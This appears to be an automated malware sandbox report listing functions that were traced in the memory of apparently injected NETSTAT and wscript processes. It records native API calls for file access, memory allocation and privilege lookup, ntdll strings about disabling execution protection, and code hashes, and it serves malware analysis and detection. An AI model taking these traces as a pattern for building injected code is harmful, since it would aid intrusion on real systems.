                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ErrorMode
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2340568224-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      • SetErrorMode.KERNELBASE(00008003,?,?,007D7C83,?), ref: 007DD45B
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001C.00000002.30154030326.00000000007D0000.00000040.00020000.sdmp, Offset: 007D0000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_28_2_7d0000_NETSTAT.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ErrorMode
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2340568224-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001C.00000002.30161938949.0000000003320000.00000040.00000001.sdmp, Offset: 03320000, based on PE: true
                                                                                                                                                      • Associated: 0000001C.00000002.30164043056.0000000003449000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 0000001C.00000002.30164124287.000000000344D000.00000040.00000001.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_28_2_3320000_NETSTAT.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Non-executed Functions

                                                                                                                                                      Strings
                                                                                                                                                      • ExecuteOptions, xrefs: 033C44AB
                                                                                                                                                      • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 033C454D
                                                                                                                                                      • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 033C4530
                                                                                                                                                      • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 033C4507
                                                                                                                                                      • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 033C4460
                                                                                                                                                      • Execute=1, xrefs: 033C451E
                                                                                                                                                      • CLIENT(ntdll): Processing section info %ws..., xrefs: 033C4592
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001C.00000002.30161938949.0000000003320000.00000040.00000001.sdmp, Offset: 03320000, based on PE: true
                                                                                                                                                      • Associated: 0000001C.00000002.30164043056.0000000003449000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 0000001C.00000002.30164124287.000000000344D000.00000040.00000001.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_28_2_3320000_NETSTAT.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                                      • API String ID: 0-484625025
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001C.00000002.30161938949.0000000003320000.00000040.00000001.sdmp, Offset: 03320000, based on PE: true
                                                                                                                                                      • Associated: 0000001C.00000002.30164043056.0000000003449000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 0000001C.00000002.30164124287.000000000344D000.00000040.00000001.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_28_2_3320000_NETSTAT.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: $$@
                                                                                                                                                      • API String ID: 0-1194432280
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Executed Functions

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      control_flow_graph 418 7385e0-738631 call 7391e0 NtCreateFile
                                                                                                                                                      APIs
                                                                                                                                                      • NtCreateFile.NTDLL(00000060,00000000,.z`,00733BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00733BB7,007A002E,00000000,00000060,00000000,00000000), ref: 0073862D
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001D.00000002.30154231684.0000000000720000.00000040.00020000.sdmp, Offset: 00720000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_29_2_720000_wscript.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CreateFile
                                                                                                                                                      • String ID: .z`
                                                                                                                                                      • API String ID: 823142352-1441809116
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      control_flow_graph 421 738690-7386d9 call 7391e0 NtReadFile
                                                                                                                                                      APIs
                                                                                                                                                      • NtReadFile.NTDLL(?,?,FFFFFFFF,?,?,?,?,?,1:s,FFFFFFFF,?,r=s,?,00000000), ref: 007386D5
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001D.00000002.30154231684.0000000000720000.00000040.00020000.sdmp, Offset: 00720000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_29_2_720000_wscript.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FileRead
                                                                                                                                                      • String ID: 1:s
                                                                                                                                                      • API String ID: 2738559852-911059018
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      control_flow_graph 424 73868d-7386a6 426 7386ac-7386d9 NtReadFile 424->426 427 7386a7 call 7391e0 424->427 427->426
                                                                                                                                                      APIs
                                                                                                                                                      • NtReadFile.NTDLL(?,?,FFFFFFFF,?,?,?,?,?,1:s,FFFFFFFF,?,r=s,?,00000000), ref: 007386D5
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001D.00000002.30154231684.0000000000720000.00000040.00020000.sdmp, Offset: 00720000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_29_2_720000_wscript.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FileRead
                                                                                                                                                      • String ID: 1:s
                                                                                                                                                      • API String ID: 2738559852-911059018
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      control_flow_graph 437 73870a-738726 438 73872c-738739 NtClose 437->438 439 738727 call 7391e0 437->439 439->438
                                                                                                                                                      APIs
                                                                                                                                                      • NtClose.NTDLL(P=s,?,?,00733D50,00000000,FFFFFFFF), ref: 00738735
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001D.00000002.30154231684.0000000000720000.00000040.00020000.sdmp, Offset: 00720000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_29_2_720000_wscript.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Close
                                                                                                                                                      • String ID: P=s
                                                                                                                                                      • API String ID: 3535843008-806985626
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      control_flow_graph 440 738710-738739 call 7391e0 NtClose
                                                                                                                                                      APIs
                                                                                                                                                      • NtClose.NTDLL(P=s,?,?,00733D50,00000000,FFFFFFFF), ref: 00738735
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001D.00000002.30154231684.0000000000720000.00000040.00020000.sdmp, Offset: 00720000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_29_2_720000_wscript.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Close
                                                                                                                                                      • String ID: P=s
                                                                                                                                                      • API String ID: 3535843008-806985626
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      control_flow_graph 550 7387c0-7387d6 551 7387dc-7387fd NtAllocateVirtualMemory 550->551 552 7387d7 call 7391e0 550->552 552->551
                                                                                                                                                      APIs
                                                                                                                                                      • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00722D11,00002000,00003000,00000004), ref: 007387F9
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001D.00000002.30154231684.0000000000720000.00000040.00020000.sdmp, Offset: 00720000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_29_2_720000_wscript.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AllocateMemoryVirtual
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2167126740-0
                                                                                                                                                      • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                                                                                                      • Instruction ID: 3afbc1f45b2214fb6a2ba29ce3578a51445fee366aa91a2dc5556b83d3113e43
                                                                                                                                                      • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                                                                                                      • Instruction Fuzzy Hash: 2CF015B2200208ABDB14DF89CC85EAB77ADAF88750F118148FE08A7241C630F910CBA0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 553 7387c2-7387fd call 7391e0 NtAllocateVirtualMemory
                                                                                                                                                      APIs
                                                                                                                                                      • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00722D11,00002000,00003000,00000004), ref: 007387F9
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001D.00000002.30154231684.0000000000720000.00000040.00020000.sdmp, Offset: 00720000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_29_2_720000_wscript.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AllocateMemoryVirtual
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2167126740-0
                                                                                                                                                      • Opcode ID: b7b15b99fa607431c14642596bc06a23face6b8274340ec77040ea26b9abdcb3
                                                                                                                                                      • Instruction ID: c8eeaa63d8778feb5f695c5eaf28dadd4bedc44049eae8413c7944b46e53f329
                                                                                                                                                      • Opcode Fuzzy Hash: b7b15b99fa607431c14642596bc06a23face6b8274340ec77040ea26b9abdcb3
                                                                                                                                                      • Instruction Fuzzy Hash: DBF015B2200108AFDB14DF88CC84EEB77A9AF88350F118248FA08A7241C630E911CBA0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001D.00000002.30163629230.00000000049E0000.00000040.00000001.sdmp, Offset: 049E0000, based on PE: true
                                                                                                                                                      • Associated: 0000001D.00000002.30165670715.0000000004B09000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 0000001D.00000002.30165732579.0000000004B0D000.00000040.00000001.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_29_2_49e0000_wscript.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      • Opcode ID: 5db8d23e68074f3bb5bb20dd342b069f07a818d99dccd0e603d45a3041c126a3
                                                                                                                                                      • Instruction ID: b6e7ad5d21a08a09f4da4efacfbec73581f0dd944b70c9380afe9e0e205d9d23
                                                                                                                                                      • Opcode Fuzzy Hash: 5db8d23e68074f3bb5bb20dd342b069f07a818d99dccd0e603d45a3041c126a3
                                                                                                                                                      • Instruction Fuzzy Hash: A190022921300002F5C07558550860A00098BD128AF91D81DA1056558CC929D8696322
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001D.00000002.30163629230.00000000049E0000.00000040.00000001.sdmp, Offset: 049E0000, based on PE: true
                                                                                                                                                      • Associated: 0000001D.00000002.30165670715.0000000004B09000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 0000001D.00000002.30165732579.0000000004B0D000.00000040.00000001.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_29_2_49e0000_wscript.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      • Opcode ID: 3b6390daac34041f6a0c78738e797304d3724ad38736179b72b494dd92040488
                                                                                                                                                      • Instruction ID: 63212cfe28b4c107d238a630bd8e3e0f74454ff03ffc5fb30f47cd7437ed04cf
                                                                                                                                                      • Opcode Fuzzy Hash: 3b6390daac34041f6a0c78738e797304d3724ad38736179b72b494dd92040488
                                                                                                                                                      • Instruction Fuzzy Hash: 3C90027120200402F5807558450474600098BD0389F51C419A60A5554EC66DDDD57666
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001D.00000002.30163629230.00000000049E0000.00000040.00000001.sdmp, Offset: 049E0000, based on PE: true
                                                                                                                                                      • Associated: 0000001D.00000002.30165670715.0000000004B09000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 0000001D.00000002.30165732579.0000000004B0D000.00000040.00000001.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_29_2_49e0000_wscript.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      • Opcode ID: 5e9b0dfde5c8b8508986420deb64e3d8d086e1005af755cb8605fc89c7192f40
                                                                                                                                                      • Instruction ID: 185fcde8bf430265bf795a3099cfbe982b98ca187c340b7ae608a506be3feb74
                                                                                                                                                      • Opcode Fuzzy Hash: 5e9b0dfde5c8b8508986420deb64e3d8d086e1005af755cb8605fc89c7192f40
                                                                                                                                                      • Instruction Fuzzy Hash: F890023120200413F55175584604707000D8BD02C9F91C81AA1465558DD66AD952B122
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001D.00000002.30163629230.00000000049E0000.00000040.00000001.sdmp, Offset: 049E0000, based on PE: true
                                                                                                                                                      • Associated: 0000001D.00000002.30165670715.0000000004B09000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 0000001D.00000002.30165732579.0000000004B0D000.00000040.00000001.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_29_2_49e0000_wscript.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      • Opcode ID: 58db505fbaed9ff7de2e6d25212d3ff0221f087a9c613ac80e4df384d803419d
                                                                                                                                                      • Instruction ID: b73b54ee13abf3022a76859989b4fee46e519d9e30e7b724f3b111caac896aac
                                                                                                                                                      • Opcode Fuzzy Hash: 58db505fbaed9ff7de2e6d25212d3ff0221f087a9c613ac80e4df384d803419d
                                                                                                                                                      • Instruction Fuzzy Hash: 4290026134200442F54075584514B060009CBE1389F51C41DE20A5554DC62DDC527127
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001D.00000002.30163629230.00000000049E0000.00000040.00000001.sdmp, Offset: 049E0000, based on PE: true
                                                                                                                                                      • Associated: 0000001D.00000002.30165670715.0000000004B09000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 0000001D.00000002.30165732579.0000000004B0D000.00000040.00000001.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_29_2_49e0000_wscript.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      • Opcode ID: 2bb4b2e6b85b09b814cbcb1d3be095939f731dec21aec078d4994881b9c42210
                                                                                                                                                      • Instruction ID: 1a62f28d92a7a63fb5e0fdbf9dda703db3f568b610e9a729ef9b759d206eb150
                                                                                                                                                      • Opcode Fuzzy Hash: 2bb4b2e6b85b09b814cbcb1d3be095939f731dec21aec078d4994881b9c42210
                                                                                                                                                      • Instruction Fuzzy Hash: A190022121280042F64079684D14B0700098BD038BF51C51DA1195554CC929D8616522
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001D.00000002.30163629230.00000000049E0000.00000040.00000001.sdmp, Offset: 049E0000, based on PE: true
                                                                                                                                                      • Associated: 0000001D.00000002.30165670715.0000000004B09000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 0000001D.00000002.30165732579.0000000004B0D000.00000040.00000001.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_29_2_49e0000_wscript.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      • Opcode ID: 3b4d0bbf90b040870e65c73a1ac25c31a5237cdc3a5e661033972c8148ca9b1d
                                                                                                                                                      • Instruction ID: 76cf038e62f0be257a477f64d7080486541a2c7e76f61e6845ed837a8a64890a
                                                                                                                                                      • Opcode Fuzzy Hash: 3b4d0bbf90b040870e65c73a1ac25c31a5237cdc3a5e661033972c8148ca9b1d
                                                                                                                                                      • Instruction Fuzzy Hash: 16900225212000032545B9580704507004A8BD53D9351C429F2056550CD635D8616122
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001D.00000002.30163629230.00000000049E0000.00000040.00000001.sdmp, Offset: 049E0000, based on PE: true
                                                                                                                                                      • Associated: 0000001D.00000002.30165670715.0000000004B09000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 0000001D.00000002.30165732579.0000000004B0D000.00000040.00000001.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_29_2_49e0000_wscript.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      • Opcode ID: f33f8918e518a15b8f7602cb7ed879f73c96a798d70575ffc0aed2d22793fb7f
                                                                                                                                                      • Instruction ID: 45721f64c7c0f1e2744e11c70cd30253531a2083a6aa9cffb69c37d5488d0e96
                                                                                                                                                      • Opcode Fuzzy Hash: f33f8918e518a15b8f7602cb7ed879f73c96a798d70575ffc0aed2d22793fb7f
                                                                                                                                                      • Instruction Fuzzy Hash: DE90026120300003654575584514616400E8BE0289B51C429E2055590DC539D8917126
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001D.00000002.30163629230.00000000049E0000.00000040.00000001.sdmp, Offset: 049E0000, based on PE: true
                                                                                                                                                      • Associated: 0000001D.00000002.30165670715.0000000004B09000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 0000001D.00000002.30165732579.0000000004B0D000.00000040.00000001.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_29_2_49e0000_wscript.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001D.00000002.30163629230.00000000049E0000.00000040.00000001.sdmp, Offset: 049E0000, based on PE: true
                                                                                                                                                      • Associated: 0000001D.00000002.30165670715.0000000004B09000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 0000001D.00000002.30165732579.0000000004B0D000.00000040.00000001.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_29_2_49e0000_wscript.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001D.00000002.30163629230.00000000049E0000.00000040.00000001.sdmp, Offset: 049E0000, based on PE: true
                                                                                                                                                      • Associated: 0000001D.00000002.30165670715.0000000004B09000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 0000001D.00000002.30165732579.0000000004B0D000.00000040.00000001.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_29_2_49e0000_wscript.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001D.00000002.30163629230.00000000049E0000.00000040.00000001.sdmp, Offset: 049E0000, based on PE: true
                                                                                                                                                      • Associated: 0000001D.00000002.30165670715.0000000004B09000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 0000001D.00000002.30165732579.0000000004B0D000.00000040.00000001.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_29_2_49e0000_wscript.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001D.00000002.30163629230.00000000049E0000.00000040.00000001.sdmp, Offset: 049E0000, based on PE: true
                                                                                                                                                      • Associated: 0000001D.00000002.30165670715.0000000004B09000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 0000001D.00000002.30165732579.0000000004B0D000.00000040.00000001.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_29_2_49e0000_wscript.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001D.00000002.30163629230.00000000049E0000.00000040.00000001.sdmp, Offset: 049E0000, based on PE: true
                                                                                                                                                      • Associated: 0000001D.00000002.30165670715.0000000004B09000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 0000001D.00000002.30165732579.0000000004B0D000.00000040.00000001.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_29_2_49e0000_wscript.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001D.00000002.30163629230.00000000049E0000.00000040.00000001.sdmp, Offset: 049E0000, based on PE: true
                                                                                                                                                      • Associated: 0000001D.00000002.30165670715.0000000004B09000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 0000001D.00000002.30165732579.0000000004B0D000.00000040.00000001.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_29_2_49e0000_wscript.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      control_flow_graph 428 7388e2-738906 429 73890c-738921 RtlFreeHeap 428->429 430 738907 call 7391e0 428->430 430->429
                                                                                                                                                      APIs
                                                                                                                                                      • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00723B93), ref: 0073891D
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001D.00000002.30154231684.0000000000720000.00000040.00020000.sdmp, Offset: 00720000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_29_2_720000_wscript.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FreeHeap
                                                                                                                                                      • String ID: .z`
                                                                                                                                                      • API String ID: 3298025750-1441809116
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      control_flow_graph 434 7388f0-738921 call 7391e0 RtlFreeHeap
                                                                                                                                                      APIs
                                                                                                                                                      • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00723B93), ref: 0073891D
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001D.00000002.30154231684.0000000000720000.00000040.00020000.sdmp, Offset: 00720000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_29_2_720000_wscript.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FreeHeap
                                                                                                                                                      • String ID: .z`
                                                                                                                                                      • API String ID: 3298025750-1441809116
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      control_flow_graph 431 7388b0-7388e1 call 7391e0 RtlAllocateHeap
                                                                                                                                                      APIs
                                                                                                                                                      • RtlAllocateHeap.NTDLL(65s,?,00733CAF,00733CAF,?,00733536,?,?,?,?,?,00000000,00000000,?), ref: 007388DD
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001D.00000002.30154231684.0000000000720000.00000040.00020000.sdmp, Offset: 00720000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_29_2_720000_wscript.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AllocateHeap
                                                                                                                                                      • String ID: 65s
                                                                                                                                                      • API String ID: 1279760036-3030032896
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,?,0072CFC2,0072CFC2,?,00000000,?,?), ref: 00738A80
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001D.00000002.30154231684.0000000000720000.00000040.00020000.sdmp, Offset: 00720000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_29_2_720000_wscript.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: LookupPrivilegeValue
